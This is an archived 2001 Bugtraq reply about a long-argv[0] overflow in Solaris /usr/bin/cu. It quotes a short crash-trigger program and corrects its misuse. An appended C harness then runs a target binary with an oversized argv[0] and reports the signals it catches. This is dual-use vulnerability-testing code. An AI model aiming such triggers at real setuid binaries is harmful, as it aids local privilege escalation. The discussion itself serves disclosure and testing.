[18895] in bugtraq
Re: Solaris /usr/bin/cu Vulnerability
daemon@ATHENA.MIT.EDU (optyx)
Tue Jan 30 20:54:01 2001
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.BSO.4.21.0101301154430.6496-100000@pr0n.newhackcity.net>
Date: Tue, 30 Jan 2001 12:01:10 -0800
Reply-To: optyx <optyx@UBERHAX0R.NET>
From: optyx <optyx@UBERHAX0R.NET>
To: BUGTRAQ@SECURITYFOCUS.COM

Dan Harkless <dan-bugtraq@DILVISH.SPEED.NET> wrote:
>Are you implying the above patches fix the cu long hardlink name
>vulnerability? This is not the case, at least on 2.6:
>
> # cat > cu_exploit.c
> #include <stdio.h>
>
> void main(int argc,char **argv)
> {
> char *buf;
>
> buf = (char *) malloc(atoi(argv[1])*sizeof(char));
> memset(buf,0x41,atoi(argv[1])-1);
> buf[atoi(argv[1])-1]=0;
> execl("/usr/bin/cu",buf,(char *)0);
> }
> # gcc cu_exploit.c
> cu_exploit.c: In function `main':
> cu_exploit.c:4: warning: return type of `main' is not `int'
> # a.out
> Segmentation fault

See that atoi(argv[1])? a.out crashed, not /usr/bin/cu. Try a.out 4000 or
whatever number next time, or trace through it with gdb.

-Optyx, Uberhax0r Communications
http://www.uberhax0r.net, leeter than dog
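As an added example (not code from either poster), here is a test harness that avoids the mistake optyx points at: the quoted program calls atoi(argv[1]) without checking argc, so running it with no argument dereferences NULL and the harness itself segfaults, which a reader can mistake for a crash in the target. This version validates its argument first, and runs the target in a child process so that waitpid() says unambiguously whether the child was killed by a signal, exited normally, or could not be executed at all. The function names parse_len and run_target are my own, and the default target is /bin/true, a stand-in chosen only so the harness runs anywhere; a tester would pass the binary under test as the second argument.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Parse the requested argv[0] length from a string that may be NULL
 * (no argument given), empty, or non-numeric. Returns the length, or -1
 * if the input is unusable. atoi(NULL) would crash the harness instead. */
long parse_len(const char *s)
{
    char *end;
    long n;

    if (s == NULL || *s == '\0')
        return -1;
    errno = 0;
    n = strtol(s, &end, 10);
    if (errno != 0 || *end != '\0' || n < 1)
        return -1;
    return n;
}

/* Execute `path` in a child with an argv[0] of `len` bytes of 'A' (0x41,
 * as in the quoted program) and report what happened to the child:
 *   0  the child exited normally with status 0
 *  >0  the child was killed by that signal number (11 == SIGSEGV on Linux)
 *  -1  fork/exec failed or the child exited with a non-zero status
 * Because the crash is observed from the parent via waitpid(), a failure
 * in the harness can no longer be confused with a failure in the target. */
int run_target(const char *path, long len)
{
    char *buf;
    pid_t pid;
    int status;

    buf = malloc((size_t)len + 1);
    if (buf == NULL)
        return -1;
    memset(buf, 'A', (size_t)len);
    buf[len] = '\0';

    pid = fork();
    if (pid < 0) {
        free(buf);
        return -1;
    }
    if (pid == 0) {
        execl(path, buf, (char *)0);
        _exit(127);              /* exec failed; reported as -1 below */
    }
    free(buf);

    if (waitpid(pid, &status, 0) < 0)
        return -1;
    if (WIFSIGNALED(status))
        return WTERMSIG(status);
    if (WIFEXITED(status) && WEXITSTATUS(status) == 0)
        return 0;
    return -1;
}

int main(int argc, char **argv)
{
    const char *target = argc > 2 ? argv[2] : "/bin/true";  /* stand-in target */
    long len = parse_len(argc > 1 ? argv[1] : NULL);
    int r;

    if (len < 0) {
        fprintf(stderr, "usage: %s <argv0-length> [target]\n", argv[0]);
        return 2;
    }
    r = run_target(target, len);
    if (r == 0)
        printf("%s: exited normally with argv[0] of %ld bytes\n", target, len);
    else if (r > 0)
        printf("%s: child killed by signal %d\n", target, r);
    else
        printf("%s: could not run target or it exited non-zero\n", target);
    return 0;
}
```

Usage: `./a.out 4000 /path/to/binary`. Running it with no length argument now prints the usage line rather than faulting, and a signal reported by the parent is attributable to the child alone.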